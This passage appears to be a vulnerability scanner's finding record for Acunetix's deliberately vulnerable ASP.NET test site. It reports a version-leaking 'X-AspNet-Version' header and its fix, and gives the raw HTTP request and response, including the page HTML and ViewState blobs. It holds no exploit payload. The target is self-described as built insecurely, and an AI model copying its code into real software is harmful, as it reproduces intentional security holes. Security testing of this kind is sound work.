YmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3761 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (3761 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 17924Response body (17924 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgIC